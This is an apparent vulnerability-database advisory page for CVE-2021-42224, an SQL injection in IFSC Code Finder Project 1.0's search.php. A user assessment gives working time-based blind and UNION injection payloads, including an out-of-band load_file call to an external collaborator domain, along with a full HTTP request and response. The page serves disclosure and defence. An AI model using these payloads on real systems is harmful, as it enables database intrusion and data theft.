Attacker Value

Very High

(1 user assessed)

Exploitability

Very High

(1 user assessed)

User Interaction

CVE-2021-42224

Disclosure Date: October 13, 2021 •

CVE-2021-42224 CVSS v3 Base Score: 9.8

MITRE ATT&CK

Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Execution

Techniques

Validation

Command and Scripting Interpreter: Python

Validated

Command and Scripting Interpreter: JavaScript/JScript

Validated

Exploitation for Client Execution

Validated

User Execution: Malicious File

Validated

Description

SQL Injection vulnerability exists in IFSC Code Finder Project 1.0 via the searchifsccode POST parameter in /search.php.

Add Assessment

nu11secur1ty (198)

October 14, 2021 8:45am UTC (3 years ago)

Ratings

Attacker Value

Very High

Exploitability

Very High

Easy to weaponize Gives privileged access Vulnerable in default configuration

Technical Analysis

Description:

vulnerability: all or nothing

SQL Injection vulnerability exists in IFSC Code Finder Project 1.0 via the searchifsccode POST parameter in /search.php.
The searchifsccode parameter appears to be vulnerable to SQL injection attacks. The test payload ‘+(select load_file(’\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\ing’))+’ was submitted in the searchifsccode parameter. This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. Also the parameter “searchifsccode” from search.php is XSS-Dom vulnerable plus PHPSESSID hijacking.

SQL injection Types

---
Parameter: searchifsccode (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchifsccode=849487'+(select load_file('\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\ing'))+'') AND (SELECT 1445 FROM (SELECT(SLEEP(5)))EBDq) AND ('ubep'='ubep&search=%C2%9E%C3%A9e

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: searchifsccode=849487'+(select load_file('\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\ing'))+'') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176766b71,0x624a5562647364654b616a684c6d546a427263576377794168415561525872414e53664d6a6e6444,0x7171786271),NULL-- -&search=%C2%9E%C3%A9e
---

Mysql Request:

POST /IFSC%20Code%20Finder%20Project%20Using%20PHP/ifscfinder/search.php HTTP/1.1
Host: 192.168.1.180
Origin: http://192.168.1.180
Cookie: PHPSESSID=jmir9unlgf2inpr758uva4ruhb
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.180/IFSC%20Code%20Finder%20Project%20Using%20PHP/ifscfinder/
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 42

searchifsccode=849487'%2b(select%20load_file('%5c%5c%5c%5cbp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net%5c%5cing'))%2b'&search=%C2%9E%C3%A9e

MySQL Response:

HTTP/1.1 200 OK
Date: Thu, 14 Oct 2021 07:02:37 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7797
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html class="no-js" lang="en">

<head>

<!--====== Title ======-->
<title>IFSC Code Finder Portal | Home</title>

<!--====== Slick CSS ======-->
<link
...[SNIP]...

Proof:

href

Reproduce:

href

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

9.8 Critical

Impact Score:

5.9

Exploitability Score:

3.9

Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

None

User Interaction (UI):

None

Scope (S):

Unchanged

Confidentiality (C):

High

Integrity (I):

High

Availability (A):

High

Vendors

phpgurukul

Products

ifsc code finder 1.0

References

Canonical

CVE-2021-42224 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42224)

Miscellaneous

https://www.exploit-db.com/exploits/50391

http://packetstormsecurity.com/files/164514/IFSC-Code-Finder-Project-1.0-SQL-Injection.html

https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-42224

Rapid7

Very High

CVE-2021-42224

Very High

Very High

None

None

Network

CVE-2021-42224

Description

Add Assessment

Ratings

Technical Analysis

CVE-2021-42224

Vendor

Description:

SQL injection Types

Mysql Request:

MySQL Response:

Proof:

Reproduce:

CVSS V3 Severity and Metrics

General Information

Vendors

Products

References

Canonical

Miscellaneous

Additional Info

Technical Analysis

Very High

CVE-2021-42224

Very High

Very High

None

None

Network

CVE-2021-42224

Description

Add Assessment

Ratings

Technical Analysis

CVE-2021-42224

Vendor

Description:

SQL injection Types

Mysql Request:

MySQL Response:

Proof:

Reproduce:

CVSS V3 Severity and Metrics

General Information

Vendors

Products

References

Canonical

Miscellaneous

Additional Info

Technical Analysis

Quick Cookie Notification